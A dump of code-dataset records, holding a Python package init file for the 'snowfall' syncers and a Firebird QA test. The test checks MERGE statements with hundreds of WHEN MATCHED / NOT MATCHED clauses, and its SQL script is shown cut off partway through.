| 39.609756 | 82 | 0.598727 | 543 | 4,872 | 5.093923 | 0.119705 | 0.111352 | 0.098698 | 0.069414 | 0.80188 | 0.77368 | 0.763196 | 0.744758 | 0.726681 | 0.713304 | 0 | 0.006741 | 0.299672 | 4,872 | 122 | 83 | 39.934426 | 0.803927 | 0.005747 | 0 | 0.752475 | 0 | 0 | 0.072078 | 0.018174 | 0 | 0 | 0 | 0 | 0.079208 | 1 | 0.069307 | false | 0 | 0.039604 | 0 | 0.108911 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2d72262bd89084429ff38c8fdcbf4d653528676e | 196 | py | Python | snowfall/generator_syncers/__init__.py | lowjiajin/snowfall | f886d770302bcbae842e649965425db205fc13f6 | [
"MIT"
] | 2 | 2021-07-06T17:49:51.000Z | 2022-03-05T09:10:40.000Z | snowfall/generator_syncers/__init__.py | lowjiajin/snowfall | f886d770302bcbae842e649965425db205fc13f6 | [
"MIT"
] | 1 | 2020-07-02T08:32:22.000Z | 2020-07-03T11:55:22.000Z | snowfall/generator_syncers/__init__.py | lowjiajin/snowfall | f886d770302bcbae842e649965425db205fc13f6 | [
"MIT"
] | null | null | null | from snowfall.generator_syncers.abstracts import BaseSyncer
from snowfall.generator_syncers.database_syncer import DatabaseSyncer
from snowfall.generator_syncers.simple_syncer import SimpleSyncer
| 49 | 69 | 0.908163 | 23 | 196 | 7.521739 | 0.521739 | 0.208092 | 0.364162 | 0.485549 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.061224 | 196 | 3 | 70 | 65.333333 | 0.940217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
2d77adff43e8cc5c1a1d697f497a684b285923ba | 36,574 | py | Python | tests/bugs/core_3639_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | tests/bugs/core_3639_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | tests/bugs/core_3639_test.py | reevespaul/firebird-qa | 98f16f425aa9ab8ee63b86172f959d63a2d76f21 | [
"MIT"
] | null | null | null | #coding:utf-8
#
# id: bugs.core_3639
# title: Allow the use of multiple WHEN MATCHED / NOT MATCHED clauses in MERGE, as per the SQL 2008 specification
# decription:
# tracker_id: CORE-3639
# min_versions: ['3.0']
# versions: 3.0
# qmid:
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = [('=.*', '')]
init_script_1 = """
recreate table ta(id int primary key, x int, y int);
recreate table tb(id int primary key, x int, y int);
commit;
insert into ta(id, x, y) values(1, 100, 111);
insert into ta(id, x, y) values(2, 200, 222);
insert into ta(id, x, y) values(3, 300, 333);
insert into ta(id, x, y) values(4, 400, 444);
insert into ta(id, x, y) values(5, 500, 555);
insert into tb(id, x, y) values(1, 10, 11);
insert into tb(id, x, y) values(4, 40, 44);
insert into tb(id, x, y) values(5, 50, 55);
commit;
recreate table s(id int, x int);
commit;
insert into s(id, x) select row_number()over(), rand()*1000000 from rdb$types;
commit;
recreate table t(id int primary key, x int);
commit;
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """
-- 1. Check ability to compile MERGE with 254 trivial `when` expressions:
-- Batch for generating SQL with MERGE and arbitrary number of WHEN sections:
-- @echo off
-- set sql=%~n0.sql
-- del %sql% 2>nul
-- set n=254
-- echo recreate table s(id int, x int); commit;>>%sql%
-- echo insert into s(id, x) select row_number()over(), rand()*1000000 from rdb$types; commit;>>%sql%
-- echo recreate table t(id int primary key, x int); commit;>>%sql%
--
-- echo merge into t using s on s.id = t.id>>%sql%
-- for /l %%i in (1, 1, %n%) do (
-- echo when NOT matched and s.id = %%i then insert values(s.id, s.x^)>>%sql%
-- )
-- echo ;>>%sql%
--
--
-- echo merge into t using s on s.id = t.id>>%sql%
-- for /l %%i in (1, 1, %n%) do (
-- echo when matched and s.id = %%i then update set t.x = t.x + s.x>>%sql%
-- )
-- echo ;>>%sql%
--
-- echo rollback;>>%sql%
-- echo set count on;>>%sql%
-- echo select * from t;>>%sql%
--
-- isql localhost/3333:e30 -i %sql%
merge into t using s on s.id = t.id
when NOT matched and s.id = 1 then insert values(s.id, s.x)
when NOT matched and s.id = 2 then insert values(s.id, s.x)
when NOT matched and s.id = 3 then insert values(s.id, s.x)
when NOT matched and s.id = 4 then insert values(s.id, s.x)
when NOT matched and s.id = 5 then insert values(s.id, s.x)
when NOT matched and s.id = 6 then insert values(s.id, s.x)
when NOT matched and s.id = 7 then insert values(s.id, s.x)
when NOT matched and s.id = 8 then insert values(s.id, s.x)
when NOT matched and s.id = 9 then insert values(s.id, s.x)
when NOT matched and s.id = 10 then insert values(s.id, s.x)
when NOT matched and s.id = 11 then insert values(s.id, s.x)
when NOT matched and s.id = 12 then insert values(s.id, s.x)
when NOT matched and s.id = 13 then insert values(s.id, s.x)
when NOT matched and s.id = 14 then insert values(s.id, s.x)
when NOT matched and s.id = 15 then insert values(s.id, s.x)
when NOT matched and s.id = 16 then insert values(s.id, s.x)
when NOT matched and s.id = 17 then insert values(s.id, s.x)
when NOT matched and s.id = 18 then insert values(s.id, s.x)
when NOT matched and s.id = 19 then insert values(s.id, s.x)
when NOT matched and s.id = 20 then insert values(s.id, s.x)
when NOT matched and s.id = 21 then insert values(s.id, s.x)
when NOT matched and s.id = 22 then insert values(s.id, s.x)
when NOT matched and s.id = 23 then insert values(s.id, s.x)
when NOT matched and s.id = 24 then insert values(s.id, s.x)
when NOT matched and s.id = 25 then insert values(s.id, s.x)
when NOT matched and s.id = 26 then insert values(s.id, s.x)
when NOT matched and s.id = 27 then insert values(s.id, s.x)
when NOT matched and s.id = 28 then insert values(s.id, s.x)
when NOT matched and s.id = 29 then insert values(s.id, s.x)
when NOT matched and s.id = 30 then insert values(s.id, s.x)
when NOT matched and s.id = 31 then insert values(s.id, s.x)
when NOT matched and s.id = 32 then insert values(s.id, s.x)
when NOT matched and s.id = 33 then insert values(s.id, s.x)
when NOT matched and s.id = 34 then insert values(s.id, s.x)
when NOT matched and s.id = 35 then insert values(s.id, s.x)
when NOT matched and s.id = 36 then insert values(s.id, s.x)
when NOT matched and s.id = 37 then insert values(s.id, s.x)
when NOT matched and s.id = 38 then insert values(s.id, s.x)
when NOT matched and s.id = 39 then insert values(s.id, s.x)
when NOT matched and s.id = 40 then insert values(s.id, s.x)
when NOT matched and s.id = 41 then insert values(s.id, s.x)
when NOT matched and s.id = 42 then insert values(s.id, s.x)
when NOT matched and s.id = 43 then insert values(s.id, s.x)
when NOT matched and s.id = 44 then insert values(s.id, s.x)
when NOT matched and s.id = 45 then insert values(s.id, s.x)
when NOT matched and s.id = 46 then insert values(s.id, s.x)
when NOT matched and s.id = 47 then insert values(s.id, s.x)
when NOT matched and s.id = 48 then insert values(s.id, s.x)
when NOT matched and s.id = 49 then insert values(s.id, s.x)
when NOT matched and s.id = 50 then insert values(s.id, s.x)
when NOT matched and s.id = 51 then insert values(s.id, s.x)
when NOT matched and s.id = 52 then insert values(s.id, s.x)
when NOT matched and s.id = 53 then insert values(s.id, s.x)
when NOT matched and s.id = 54 then insert values(s.id, s.x)
when NOT matched and s.id = 55 then insert values(s.id, s.x)
when NOT matched and s.id = 56 then insert values(s.id, s.x)
when NOT matched and s.id = 57 then insert values(s.id, s.x)
when NOT matched and s.id = 58 then insert values(s.id, s.x)
when NOT matched and s.id = 59 then insert values(s.id, s.x)
when NOT matched and s.id = 60 then insert values(s.id, s.x)
when NOT matched and s.id = 61 then insert values(s.id, s.x)
when NOT matched and s.id = 62 then insert values(s.id, s.x)
when NOT matched and s.id = 63 then insert values(s.id, s.x)
when NOT matched and s.id = 64 then insert values(s.id, s.x)
when NOT matched and s.id = 65 then insert values(s.id, s.x)
when NOT matched and s.id = 66 then insert values(s.id, s.x)
when NOT matched and s.id = 67 then insert values(s.id, s.x)
when NOT matched and s.id = 68 then insert values(s.id, s.x)
when NOT matched and s.id = 69 then insert values(s.id, s.x)
when NOT matched and s.id = 70 then insert values(s.id, s.x)
when NOT matched and s.id = 71 then insert values(s.id, s.x)
when NOT matched and s.id = 72 then insert values(s.id, s.x)
when NOT matched and s.id = 73 then insert values(s.id, s.x)
when NOT matched and s.id = 74 then insert values(s.id, s.x)
when NOT matched and s.id = 75 then insert values(s.id, s.x)
when NOT matched and s.id = 76 then insert values(s.id, s.x)
when NOT matched and s.id = 77 then insert values(s.id, s.x)
when NOT matched and s.id = 78 then insert values(s.id, s.x)
when NOT matched and s.id = 79 then insert values(s.id, s.x)
when NOT matched and s.id = 80 then insert values(s.id, s.x)
when NOT matched and s.id = 81 then insert values(s.id, s.x)
when NOT matched and s.id = 82 then insert values(s.id, s.x)
when NOT matched and s.id = 83 then insert values(s.id, s.x)
when NOT matched and s.id = 84 then insert values(s.id, s.x)
when NOT matched and s.id = 85 then insert values(s.id, s.x)
when NOT matched and s.id = 86 then insert values(s.id, s.x)
when NOT matched and s.id = 87 then insert values(s.id, s.x)
when NOT matched and s.id = 88 then insert values(s.id, s.x)
when NOT matched and s.id = 89 then insert values(s.id, s.x)
when NOT matched and s.id = 90 then insert values(s.id, s.x)
when NOT matched and s.id = 91 then insert values(s.id, s.x)
when NOT matched and s.id = 92 then insert values(s.id, s.x)
when NOT matched and s.id = 93 then insert values(s.id, s.x)
when NOT matched and s.id = 94 then insert values(s.id, s.x)
when NOT matched and s.id = 95 then insert values(s.id, s.x)
when NOT matched and s.id = 96 then insert values(s.id, s.x)
when NOT matched and s.id = 97 then insert values(s.id, s.x)
when NOT matched and s.id = 98 then insert values(s.id, s.x)
when NOT matched and s.id = 99 then insert values(s.id, s.x)
when NOT matched and s.id = 100 then insert values(s.id, s.x)
when NOT matched and s.id = 101 then insert values(s.id, s.x)
when NOT matched and s.id = 102 then insert values(s.id, s.x)
when NOT matched and s.id = 103 then insert values(s.id, s.x)
when NOT matched and s.id = 104 then insert values(s.id, s.x)
when NOT matched and s.id = 105 then insert values(s.id, s.x)
when NOT matched and s.id = 106 then insert values(s.id, s.x)
when NOT matched and s.id = 107 then insert values(s.id, s.x)
when NOT matched and s.id = 108 then insert values(s.id, s.x)
when NOT matched and s.id = 109 then insert values(s.id, s.x)
when NOT matched and s.id = 110 then insert values(s.id, s.x)
when NOT matched and s.id = 111 then insert values(s.id, s.x)
when NOT matched and s.id = 112 then insert values(s.id, s.x)
when NOT matched and s.id = 113 then insert values(s.id, s.x)
when NOT matched and s.id = 114 then insert values(s.id, s.x)
when NOT matched and s.id = 115 then insert values(s.id, s.x)
when NOT matched and s.id = 116 then insert values(s.id, s.x)
when NOT matched and s.id = 117 then insert values(s.id, s.x)
when NOT matched and s.id = 118 then insert values(s.id, s.x)
when NOT matched and s.id = 119 then insert values(s.id, s.x)
when NOT matched and s.id = 120 then insert values(s.id, s.x)
when NOT matched and s.id = 121 then insert values(s.id, s.x)
when NOT matched and s.id = 122 then insert values(s.id, s.x)
when NOT matched and s.id = 123 then insert values(s.id, s.x)
when NOT matched and s.id = 124 then insert values(s.id, s.x)
when NOT matched and s.id = 125 then insert values(s.id, s.x)
when NOT matched and s.id = 126 then insert values(s.id, s.x)
when NOT matched and s.id = 127 then insert values(s.id, s.x)
when NOT matched and s.id = 128 then insert values(s.id, s.x)
when NOT matched and s.id = 129 then insert values(s.id, s.x)
when NOT matched and s.id = 130 then insert values(s.id, s.x)
when NOT matched and s.id = 131 then insert values(s.id, s.x)
when NOT matched and s.id = 132 then insert values(s.id, s.x)
when NOT matched and s.id = 133 then insert values(s.id, s.x)
when NOT matched and s.id = 134 then insert values(s.id, s.x)
when NOT matched and s.id = 135 then insert values(s.id, s.x)
when NOT matched and s.id = 136 then insert values(s.id, s.x)
when NOT matched and s.id = 137 then insert values(s.id, s.x)
when NOT matched and s.id = 138 then insert values(s.id, s.x)
when NOT matched and s.id = 139 then insert values(s.id, s.x)
when NOT matched and s.id = 140 then insert values(s.id, s.x)
when NOT matched and s.id = 141 then insert values(s.id, s.x)
when NOT matched and s.id = 142 then insert values(s.id, s.x)
when NOT matched and s.id = 143 then insert values(s.id, s.x)
when NOT matched and s.id = 144 then insert values(s.id, s.x)
when NOT matched and s.id = 145 then insert values(s.id, s.x)
when NOT matched and s.id = 146 then insert values(s.id, s.x)
when NOT matched and s.id = 147 then insert values(s.id, s.x)
when NOT matched and s.id = 148 then insert values(s.id, s.x)
when NOT matched and s.id = 149 then insert values(s.id, s.x)
when NOT matched and s.id = 150 then insert values(s.id, s.x)
when NOT matched and s.id = 151 then insert values(s.id, s.x)
when NOT matched and s.id = 152 then insert values(s.id, s.x)
when NOT matched and s.id = 153 then insert values(s.id, s.x)
when NOT matched and s.id = 154 then insert values(s.id, s.x)
when NOT matched and s.id = 155 then insert values(s.id, s.x)
when NOT matched and s.id = 156 then insert values(s.id, s.x)
when NOT matched and s.id = 157 then insert values(s.id, s.x)
when NOT matched and s.id = 158 then insert values(s.id, s.x)
when NOT matched and s.id = 159 then insert values(s.id, s.x)
when NOT matched and s.id = 160 then insert values(s.id, s.x)
when NOT matched and s.id = 161 then insert values(s.id, s.x)
when NOT matched and s.id = 162 then insert values(s.id, s.x)
when NOT matched and s.id = 163 then insert values(s.id, s.x)
when NOT matched and s.id = 164 then insert values(s.id, s.x)
when NOT matched and s.id = 165 then insert values(s.id, s.x)
when NOT matched and s.id = 166 then insert values(s.id, s.x)
when NOT matched and s.id = 167 then insert values(s.id, s.x)
when NOT matched and s.id = 168 then insert values(s.id, s.x)
when NOT matched and s.id = 169 then insert values(s.id, s.x)
when NOT matched and s.id = 170 then insert values(s.id, s.x)
when NOT matched and s.id = 171 then insert values(s.id, s.x)
when NOT matched and s.id = 172 then insert values(s.id, s.x)
when NOT matched and s.id = 173 then insert values(s.id, s.x)
when NOT matched and s.id = 174 then insert values(s.id, s.x)
when NOT matched and s.id = 175 then insert values(s.id, s.x)
when NOT matched and s.id = 176 then insert values(s.id, s.x)
when NOT matched and s.id = 177 then insert values(s.id, s.x)
when NOT matched and s.id = 178 then insert values(s.id, s.x)
when NOT matched and s.id = 179 then insert values(s.id, s.x)
when NOT matched and s.id = 180 then insert values(s.id, s.x)
when NOT matched and s.id = 181 then insert values(s.id, s.x)
when NOT matched and s.id = 182 then insert values(s.id, s.x)
when NOT matched and s.id = 183 then insert values(s.id, s.x)
when NOT matched and s.id = 184 then insert values(s.id, s.x)
when NOT matched and s.id = 185 then insert values(s.id, s.x)
when NOT matched and s.id = 186 then insert values(s.id, s.x)
when NOT matched and s.id = 187 then insert values(s.id, s.x)
when NOT matched and s.id = 188 then insert values(s.id, s.x)
when NOT matched and s.id = 189 then insert values(s.id, s.x)
when NOT matched and s.id = 190 then insert values(s.id, s.x)
when NOT matched and s.id = 191 then insert values(s.id, s.x)
when NOT matched and s.id = 192 then insert values(s.id, s.x)
when NOT matched and s.id = 193 then insert values(s.id, s.x)
when NOT matched and s.id = 194 then insert values(s.id, s.x)
when NOT matched and s.id = 195 then insert values(s.id, s.x)
when NOT matched and s.id = 196 then insert values(s.id, s.x)
when NOT matched and s.id = 197 then insert values(s.id, s.x)
when NOT matched and s.id = 198 then insert values(s.id, s.x)
when NOT matched and s.id = 199 then insert values(s.id, s.x)
when NOT matched and s.id = 200 then insert values(s.id, s.x)
when NOT matched and s.id = 201 then insert values(s.id, s.x)
when NOT matched and s.id = 202 then insert values(s.id, s.x)
when NOT matched and s.id = 203 then insert values(s.id, s.x)
when NOT matched and s.id = 204 then insert values(s.id, s.x)
when NOT matched and s.id = 205 then insert values(s.id, s.x)
when NOT matched and s.id = 206 then insert values(s.id, s.x)
when NOT matched and s.id = 207 then insert values(s.id, s.x)
when NOT matched and s.id = 208 then insert values(s.id, s.x)
when NOT matched and s.id = 209 then insert values(s.id, s.x)
when NOT matched and s.id = 210 then insert values(s.id, s.x)
when NOT matched and s.id = 211 then insert values(s.id, s.x)
when NOT matched and s.id = 212 then insert values(s.id, s.x)
when NOT matched and s.id = 213 then insert values(s.id, s.x)
when NOT matched and s.id = 214 then insert values(s.id, s.x)
when NOT matched and s.id = 215 then insert values(s.id, s.x)
when NOT matched and s.id = 216 then insert values(s.id, s.x)
when NOT matched and s.id = 217 then insert values(s.id, s.x)
when NOT matched and s.id = 218 then insert values(s.id, s.x)
when NOT matched and s.id = 219 then insert values(s.id, s.x)
when NOT matched and s.id = 220 then insert values(s.id, s.x)
when NOT matched and s.id = 221 then insert values(s.id, s.x)
when NOT matched and s.id = 222 then insert values(s.id, s.x)
when NOT matched and s.id = 223 then insert values(s.id, s.x)
when NOT matched and s.id = 224 then insert values(s.id, s.x)
when NOT matched and s.id = 225 then insert values(s.id, s.x)
when NOT matched and s.id = 226 then insert values(s.id, s.x)
when NOT matched and s.id = 227 then insert values(s.id, s.x)
when NOT matched and s.id = 228 then insert values(s.id, s.x)
when NOT matched and s.id = 229 then insert values(s.id, s.x)
when NOT matched and s.id = 230 then insert values(s.id, s.x)
when NOT matched and s.id = 231 then insert values(s.id, s.x)
when NOT matched and s.id = 232 then insert values(s.id, s.x)
when NOT matched and s.id = 233 then insert values(s.id, s.x)
when NOT matched and s.id = 234 then insert values(s.id, s.x)
when NOT matched and s.id = 235 then insert values(s.id, s.x)
when NOT matched and s.id = 236 then insert values(s.id, s.x)
when NOT matched and s.id = 237 then insert values(s.id, s.x)
when NOT matched and s.id = 238 then insert values(s.id, s.x)
when NOT matched and s.id = 239 then insert values(s.id, s.x)
when NOT matched and s.id = 240 then insert values(s.id, s.x)
when NOT matched and s.id = 241 then insert values(s.id, s.x)
when NOT matched and s.id = 242 then insert values(s.id, s.x)
when NOT matched and s.id = 243 then insert values(s.id, s.x)
when NOT matched and s.id = 244 then insert values(s.id, s.x)
when NOT matched and s.id = 245 then insert values(s.id, s.x)
when NOT matched and s.id = 246 then insert values(s.id, s.x)
when NOT matched and s.id = 247 then insert values(s.id, s.x)
when NOT matched and s.id = 248 then insert values(s.id, s.x)
when NOT matched and s.id = 249 then insert values(s.id, s.x)
when NOT matched and s.id = 250 then insert values(s.id, s.x)
when NOT matched and s.id = 251 then insert values(s.id, s.x)
when NOT matched and s.id = 252 then insert values(s.id, s.x)
when NOT matched and s.id = 253 then insert values(s.id, s.x)
when NOT matched and s.id = 254 then insert values(s.id, s.x)
;
merge into t using s on s.id = t.id
when matched and s.id = 1 then update set t.x = t.x + s.x
when matched and s.id = 2 then update set t.x = t.x + s.x
when matched and s.id = 3 then update set t.x = t.x + s.x
when matched and s.id = 4 then update set t.x = t.x + s.x
when matched and s.id = 5 then update set t.x = t.x + s.x
when matched and s.id = 6 then update set t.x = t.x + s.x
when matched and s.id = 7 then update set t.x = t.x + s.x
when matched and s.id = 8 then update set t.x = t.x + s.x
when matched and s.id = 9 then update set t.x = t.x + s.x
when matched and s.id = 10 then update set t.x = t.x + s.x
when matched and s.id = 11 then update set t.x = t.x + s.x
when matched and s.id = 12 then update set t.x = t.x + s.x
when matched and s.id = 13 then update set t.x = t.x + s.x
when matched and s.id = 14 then update set t.x = t.x + s.x
when matched and s.id = 15 then update set t.x = t.x + s.x
when matched and s.id = 16 then update set t.x = t.x + s.x
when matched and s.id = 17 then update set t.x = t.x + s.x
when matched and s.id = 18 then update set t.x = t.x + s.x
when matched and s.id = 19 then update set t.x = t.x + s.x
when matched and s.id = 20 then update set t.x = t.x + s.x
when matched and s.id = 21 then update set t.x = t.x + s.x
when matched and s.id = 22 then update set t.x = t.x + s.x
when matched and s.id = 23 then update set t.x = t.x + s.x
when matched and s.id = 24 then update set t.x = t.x + s.x
when matched and s.id = 25 then update set t.x = t.x + s.x
when matched and s.id = 26 then update set t.x = t.x + s.x
when matched and s.id = 27 then update set t.x = t.x + s.x
when matched and s.id = 28 then update set t.x = t.x + s.x
when matched and s.id = 29 then update set t.x = t.x + s.x
when matched and s.id = 30 then update set t.x = t.x + s.x
when matched and s.id = 31 then update set t.x = t.x + s.x
when matched and s.id = 32 then update set t.x = t.x + s.x
when matched and s.id = 33 then update set t.x = t.x + s.x
when matched and s.id = 34 then update set t.x = t.x + s.x
when matched and s.id = 35 then update set t.x = t.x + s.x
when matched and s.id = 36 then update set t.x = t.x + s.x
when matched and s.id = 37 then update set t.x = t.x + s.x
when matched and s.id = 38 then update set t.x = t.x + s.x
when matched and s.id = 39 then update set t.x = t.x + s.x
when matched and s.id = 40 then update set t.x = t.x + s.x
when matched and s.id = 41 then update set t.x = t.x + s.x
when matched and s.id = 42 then update set t.x = t.x + s.x
when matched and s.id = 43 then update set t.x = t.x + s.x
when matched and s.id = 44 then update set t.x = t.x + s.x
when matched and s.id = 45 then update set t.x = t.x + s.x
when matched and s.id = 46 then update set t.x = t.x + s.x
when matched and s.id = 47 then update set t.x = t.x + s.x
when matched and s.id = 48 then update set t.x = t.x + s.x
when matched and s.id = 49 then update set t.x = t.x + s.x
when matched and s.id = 50 then update set t.x = t.x + s.x
when matched and s.id = 51 then update set t.x = t.x + s.x
when matched and s.id = 52 then update set t.x = t.x + s.x
when matched and s.id = 53 then update set t.x = t.x + s.x
when matched and s.id = 54 then update set t.x = t.x + s.x
when matched and s.id = 55 then update set t.x = t.x + s.x
when matched and s.id = 56 then update set t.x = t.x + s.x
when matched and s.id = 57 then update set t.x = t.x + s.x
when matched and s.id = 58 then update set t.x = t.x + s.x
when matched and s.id = 59 then update set t.x = t.x + s.x
when matched and s.id = 60 then update set t.x = t.x + s.x
when matched and s.id = 61 then update set t.x = t.x + s.x
when matched and s.id = 62 then update set t.x = t.x + s.x
when matched and s.id = 63 then update set t.x = t.x + s.x
when matched and s.id = 64 then update set t.x = t.x + s.x
when matched and s.id = 65 then update set t.x = t.x + s.x
when matched and s.id = 66 then update set t.x = t.x + s.x
when matched and s.id = 67 then update set t.x = t.x + s.x
when matched and s.id = 68 then update set t.x = t.x + s.x
when matched and s.id = 69 then update set t.x = t.x + s.x
when matched and s.id = 70 then update set t.x = t.x + s.x
when matched and s.id = 71 then update set t.x = t.x + s.x
when matched and s.id = 72 then update set t.x = t.x + s.x
when matched and s.id = 73 then update set t.x = t.x + s.x
when matched and s.id = 74 then update set t.x = t.x + s.x
when matched and s.id = 75 then update set t.x = t.x + s.x
when matched and s.id = 76 then update set t.x = t.x + s.x
when matched and s.id = 77 then update set t.x = t.x + s.x
when matched and s.id = 78 then update set t.x = t.x + s.x
when matched and s.id = 79 then update set t.x = t.x + s.x
when matched and s.id = 80 then update set t.x = t.x + s.x
when matched and s.id = 81 then update set t.x = t.x + s.x
when matched and s.id = 82 then update set t.x = t.x + s.x
when matched and s.id = 83 then update set t.x = t.x + s.x
when matched and s.id = 84 then update set t.x = t.x + s.x
when matched and s.id = 85 then update set t.x = t.x + s.x
when matched and s.id = 86 then update set t.x = t.x + s.x
when matched and s.id = 87 then update set t.x = t.x + s.x
when matched and s.id = 88 then update set t.x = t.x + s.x
when matched and s.id = 89 then update set t.x = t.x + s.x
when matched and s.id = 90 then update set t.x = t.x + s.x
when matched and s.id = 91 then update set t.x = t.x + s.x
when matched and s.id = 92 then update set t.x = t.x + s.x
when matched and s.id = 93 then update set t.x = t.x + s.x
when matched and s.id = 94 then update set t.x = t.x + s.x
when matched and s.id = 95 then update set t.x = t.x + s.x
when matched and s.id = 96 then update set t.x = t.x + s.x
when matched and s.id = 97 then update set t.x = t.x + s.x
when matched and s.id = 98 then update set t.x = t.x + s.x
when matched and s.id = 99 then update set t.x = t.x + s.x
when matched and s.id = 100 then update set t.x = t.x + s.x
when matched and s.id = 101 then update set t.x = t.x + s.x
when matched and s.id = 102 then update set t.x = t.x + s.x
when matched and s.id = 103 then update set t.x = t.x + s.x
when matched and s.id = 104 then update set t.x = t.x + s.x
when matched and s.id = 105 then update set t.x = t.x + s.x
when matched and s.id = 106 then update set t.x = t.x + s.x
when matched and s.id = 107 then update set t.x = t.x + s.x
when matched and s.id = 108 then update set t.x = t.x + s.x
when matched and s.id = 109 then update set t.x = t.x + s.x
when matched and s.id = 110 then update set t.x = t.x + s.x
when matched and s.id = 111 then update set t.x = t.x + s.x
when matched and s.id = 112 then update set t.x = t.x + s.x
when matched and s.id = 113 then update set t.x = t.x + s.x
when matched and s.id = 114 then update set t.x = t.x + s.x
when matched and s.id = 115 then update set t.x = t.x + s.x
when matched and s.id = 116 then update set t.x = t.x + s.x
when matched and s.id = 117 then update set t.x = t.x + s.x
when matched and s.id = 118 then update set t.x = t.x + s.x
when matched and s.id = 119 then update set t.x = t.x + s.x
when matched and s.id = 120 then update set t.x = t.x + s.x
when matched and s.id = 121 then update set t.x = t.x + s.x
when matched and s.id = 122 then update set t.x = t.x + s.x
when matched and s.id = 123 then update set t.x = t.x + s.x
when matched and s.id = 124 then update set t.x = t.x + s.x
when matched and s.id = 125 then update set t.x = t.x + s.x
when matched and s.id = 126 then update set t.x = t.x + s.x
when matched and s.id = 127 then update set t.x = t.x + s.x
when matched and s.id = 128 then update set t.x = t.x + s.x
when matched and s.id = 129 then update set t.x = t.x + s.x
when matched and s.id = 130 then update set t.x = t.x + s.x
when matched and s.id = 131 then update set t.x = t.x + s.x
when matched and s.id = 132 then update set t.x = t.x + s.x
when matched and s.id = 133 then update set t.x = t.x + s.x
when matched and s.id = 134 then update set t.x = t.x + s.x
when matched and s.id = 135 then update set t.x = t.x + s.x
when matched and s.id = 136 then update set t.x = t.x + s.x
when matched and s.id = 137 then update set t.x = t.x + s.x
when matched and s.id = 138 then update set t.x = t.x + s.x
when matched and s.id = 139 then update set t.x = t.x + s.x
when matched and s.id = 140 then update set t.x = t.x + s.x
when matched and s.id = 141 then update set t.x = t.x + s.x
when matched and s.id = 142 then update set t.x = t.x + s.x
when matched and s.id = 143 then update set t.x = t.x + s.x
when matched and s.id = 144 then update set t.x = t.x + s.x
when matched and s.id = 145 then update set t.x = t.x + s.x
when matched and s.id = 146 then update set t.x = t.x + s.x
when matched and s.id = 147 then update set t.x = t.x + s.x
when matched and s.id = 148 then update set t.x = t.x + s.x
when matched and s.id = 149 then update set t.x = t.x + s.x
when matched and s.id = 150 then update set t.x = t.x + s.x
when matched and s.id = 151 then update set t.x = t.x + s.x
when matched and s.id = 152 then update set t.x = t.x + s.x
when matched and s.id = 153 then update set t.x = t.x + s.x
when matched and s.id = 154 then update set t.x = t.x + s.x
when matched and s.id = 155 then update set t.x = t.x + s.x
when matched and s.id = 156 then update set t.x = t.x + s.x
when matched and s.id = 157 then update set t.x = t.x + s.x
when matched and s.id = 158 then update set t.x = t.x + s.x
when matched and s.id = 159 then update set t.x = t.x + s.x
when matched and s.id = 160 then update set t.x = t.x + s.x
when matched and s.id = 161 then update set t.x = t.x + s.x
when matched and s.id = 162 then update set t.x = t.x + s.x
when matched and s.id = 163 then update set t.x = t.x + s.x
when matched and s.id = 164 then update set t.x = t.x + s.x
when matched and s.id = 165 then update set t.x = t.x + s.x
when matched and s.id = 166 then update set t.x = t.x + s.x
when matched and s.id = 167 then update set t.x = t.x + s.x
when matched and s.id = 168 then update set t.x = t.x + s.x
when matched and s.id = 169 then update set t.x = t.x + s.x
when matched and s.id = 170 then update set t.x = t.x + s.x
when matched and s.id = 171 then update set t.x = t.x + s.x
when matched and s.id = 172 then update set t.x = t.x + s.x
when matched and s.id = 173 then update set t.x = t.x + s.x
when matched and s.id = 174 then update set t.x = t.x + s.x
when matched and s.id = 175 then update set t.x = t.x + s.x
when matched and s.id = 176 then update set t.x = t.x + s.x
when matched and s.id = 177 then update set t.x = t.x + s.x
when matched and s.id = 178 then update set t.x = t.x + s.x
when matched and s.id = 179 then update set t.x = t.x + s.x
when matched and s.id = 180 then update set t.x = t.x + s.x
when matched and s.id = 181 then update set t.x = t.x + s.x
when matched and s.id = 182 then update set t.x = t.x + s.x
when matched and s.id = 183 then update set t.x = t.x + s.x
when matched and s.id = 184 then update set t.x = t.x + s.x
when matched and s.id = 185 then update set t.x = t.x + s.x
when matched and s.id = 186 then update set t.x = t.x + s.x
when matched and s.id = 187 then update set t.x = t.x + s.x
when matched and s.id = 188 then update set t.x = t.x + s.x
when matched and s.id = 189 then update set t.x = t.x + s.x
when matched and s.id = 190 then update set t.x = t.x + s.x
when matched and s.id = 191 then update set t.x = t.x + s.x
when matched and s.id = 192 then update set t.x = t.x + s.x
when matched and s.id = 193 then update set t.x = t.x + s.x
when matched and s.id = 194 then update set t.x = t.x + s.x
when matched and s.id = 195 then update set t.x = t.x + s.x
when matched and s.id = 196 then update set t.x = t.x + s.x
when matched and s.id = 197 then update set t.x = t.x + s.x
when matched and s.id = 198 then update set t.x = t.x + s.x
when matched and s.id = 199 then update set t.x = t.x + s.x
when matched and s.id = 200 then update set t.x = t.x + s.x
when matched and s.id = 201 then update set t.x = t.x + s.x
when matched and s.id = 202 then update set t.x = t.x + s.x
when matched and s.id = 203 then update set t.x = t.x + s.x
when matched and s.id = 204 then update set t.x = t.x + s.x
when matched and s.id = 205 then update set t.x = t.x + s.x
when matched and s.id = 206 then update set t.x = t.x + s.x
when matched and s.id = 207 then update set t.x = t.x + s.x
